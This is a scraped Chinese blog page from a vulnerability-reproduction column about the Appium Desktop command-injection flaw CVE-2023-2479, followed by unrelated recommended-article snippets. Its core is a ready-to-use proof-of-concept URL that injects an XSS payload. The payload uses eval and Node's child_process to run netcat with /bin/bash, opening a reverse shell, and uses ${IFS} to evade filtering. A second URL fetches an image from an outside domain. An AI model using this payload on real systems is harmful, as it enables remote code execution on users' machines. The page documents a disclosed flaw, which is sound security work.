Appium Desktop CVE-2023-2479漏洞

最新推荐文章于 2025-12-05 17:21:44 发布

原创最新推荐文章于 2025-12-05 17:21:44 发布 · 128 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#appium #安全威胁分析 #web安全 #漏洞复现 #漏洞库 #网络安全

漏洞复现专栏收录该内容

181 篇文章

订阅专栏

漏洞描述

appium-desktop 是 Appium 服务器的图形界面，也是一个应用程序检查器

由于用户输入审查不当，此软件包的受影响版本容易受到命令注入的攻击，允许攻击者设置反向 shell。

poc

http://127.0.0.1/?xss=<img/src="1"/onerror=eval("require('child_process').exec('nc${IFS}localhost${IFS}4444${IFS}-e${IFS}/bin/bash');");>

http://127.0.0.1/?url=<img/src="http://nbjfpetfmu.dgrh3.cn">

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Sword-heart

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

使用Appium Desktop遇到的一些坑

Oops_newbie的博客

01-10

6413

1. appium-desktop安装时采用选择了all user, 之后执行脚本时，执行到 webdriver.Remote("http://127.0.0.1:4723/wd/hub", desired_caps) 会出现以下错误 selenium.common.exceptions.WebDriverException: Message: An unknown server-sid...

精选资源

appium-desktop-setup-1.8.2.rar

03-12

这个名为"appium-desktop-setup-1.8.2.rar"的压缩包文件包含了安装程序，即"appium-desktop-setup-1.8.2.exe"，用于在您的计算机上安装Appium Desktop。一、Appium Desktop简介 Appium Desktop 是基于Appium...

参与评论您还未登录，请先登录后发表或查看评论

Flutter 自动化测试 -appium-flutter-driver

朱雀随云记的博客

08-25

1460

作为Flutter开发，FlutterDriver是足够帮助他们进行测试的，而作为自动化测试工程师最大的困难是对dart语言不了解，不知道如何在FlutterDriver驱动下用Dart语言编写TestCase，所以需要一款更加简单的、不需要学习Dart语言的工具来帮助我们去实现自动化测试，而Appium Flutter Driver满足这一点。Appium Flutter Driver是一款可以跨平台测试Flutter应用的自动化测试工具，并且是Appium移动端测试工具的一部分。

Appium----基于Windows系统安装Appium Inspector

redrose2100的博客

02-20

915

本文详细介绍了如何安装Appium inspector

Appium基础学习之 | Appium-Desktop使用

热门推荐

雨墨轩痕

03-11

1万+

本来还想继续写一篇UiAutomator2.0新增几个API的介绍，但是已经迫不及待回到Appium的轨道中来了，了解UiAutomator2.0与Instrumentation、Accessibility对于学习android自动化帮助都是特别大的，有机会还是想继续往下研究的。从这篇文章开始就正式回到Appium的使用中来了。一、Appium-Desktop下载 Appium-Deskto...

自动化测试-Appium（appium-desktop安装）

weixin_45576146的博客

03-12

595

appium-桌面安装目录1.[官网](http://appium.io/)下载2.执行安装 1.官网下载下载: appium-windows-1.20.2.exe 2.执行安装这里我选择了第一个完成

Appium：Appium-Python-Client与Selenium版本不兼容导致的问题

q1003675852的博客

06-14

2587

本文主要记录Appium-Python-Client与Selenium版本不兼容导致的两类问题：No module named 'appium.webdriver.common.touch_action及AttributeError: 'NoneType' object has no attribute 'to_capabilities'的原因及解决方案

Appium----基于Windows系统安装Appium

redrose2100的博客

02-19

979

本文详细介绍了如何安装Appium

Flutter自动化测试（appium-flutter-driver）

测试打工人

11-06

1407

随着移动应用开发的迅速发展，Flutter作为一个跨平台框架，以其高效的开发和良好的性能受到了广泛的关注。然而，如何有效地对Flutter应用进行自动化测试也是开发者们关注的话题。本文将介绍一种基于Appium的解决方案：appium-flutter-driver，并指导您如何在Windows环境下安装及使用它来编写测试代码。

Appium-Desktop功能使用说明

GalenGao

11-29

2440

前言上面一篇介绍了如何在Mac电脑集成基于Appium的IOS测试环境，如果你的电脑没有集成Appium环境，请参考我之前写的一篇文章：macos平台搭建基于Appium的IOS测试环境。一切准备就绪后方可进行下一步app的调试工作。调试IOS APP 本文以Chrome为例，进行Appium-Desktop的功能演示，首先在启动appium页面配置如下参数：参数配置完成后点击Start ...

Appium-Inspector-2023.2.1 windows linux mac

03-03

对于Windows用户，`Appium-Inspector-windows-2023.2.1.zip`包含了Windows平台的安装包，可以解压后直接运行。Linux用户则有`Appium-Inspector-linux-2023.2.1.AppImage`，这是一个可以直接执行的应用程序，无需安装...

精选资源

03-16

07-21

方便github下载慢的同学。 Appium-desktop-最新版；Appium-windows-1.13.0。官网：http://appium.io/ 官方下载地址：https://github.com/appium/appium-desktop/releases

精选资源

appium-desktop-setup-1.10.0.exe

12-06

appium-desktop-setup-1.10.0.exe

weblogic漏洞——CVE-2020-14882

weixin_57379923的博客

08-13

1928

企业多类型项目验收：渗透测试核心指南

最新发布

HNhlsa的博客

12-05

867

APP刚上线就因订单篡改漏洞造成经济损失；医院病历系统因安全漏洞导致数据泄露；电商平台促销前没做安全测试，被黑客利用漏洞通过优惠券套利近百万......这些教训的背后都指向同一个问题：企业在项目验收时漏了“安全测试”这一关键环节。2026年1月1日，新修订的《中华人民共和国网络安全法》即将正式施行，罚款上限提到1000万！不管是用户用的网站、APP，还是公司内部的办公系统，渗透测试都从“可做可不做”升级为“强制要求”。本文将直击要害：企业为何必须开展渗透测试？又该在何时启动？

网络安全中级阶段学习笔记（五）：CSRF跨站请求伪造学习笔记（超全总结）

2501_91976946的博客

12-04

677

本文系统总结了CSRF跨站请求伪造攻击的核心知识。主要内容包括：1) 前置基础：解释了Cookie、Session和同源策略的关系；2) 攻击原理：分析了CSRF的定义、核心逻辑和特点；3) 攻击类型：详细介绍了GET型和POST型CSRF的实现方式，并提供了实战案例；4) 进阶攻击：阐述了JSONP劫持、CORS劫持等跨域资源劫持方法；5) 防御措施：重点推荐Anti-CSRF Token等服务器端防御手段，并给出防御优先级建议。全文通过流程图、对比表等形式梳理关键知识点

网络安全（黑客技术）—2025自学手册

2401_84760527的博客

11-24

1715

网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的，技术上面其实有很大的重叠性，抛开甲乙方、岗位名称、岗位职责等因素来看，作为学技术的，也根据以往我们给学员推荐就业和入职情况来看，只要好好掌握以下几种技术（网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言）中的2到3个，都可以较好的胜任工作需求。

中科大计算机网络——网络安全

Tandy12356_的博客

12-01

404

使用checksum作为H不合适，因为很容易反向计算出m'与m有同样的报文摘要。为何不能让你逆向推导出报文m？防止你用不合法的协议m'在法庭上要挟签名人。使用公开密钥加密体系作认证的缺陷：中间人攻击。本质原因：Bob没有拿到真正Alice的公钥。解决方案：让Bob可靠地拿到Alice的公钥。只要根是可靠的，后面大概率也是可靠的。求幂次方和求模运算代价非常大。

Appium Desktop 1.17.1-1 快速下载指南

在文件名称列表中我们看到 "Appium-windows-1.17.1-1.exe"，这是一个可执行文件，用于在 Windows 系统上安装 Appium Desktop。通常，开发者或测试人员会在不同的操作系统上进行应用程序测试，因此 Appium 提供了跨...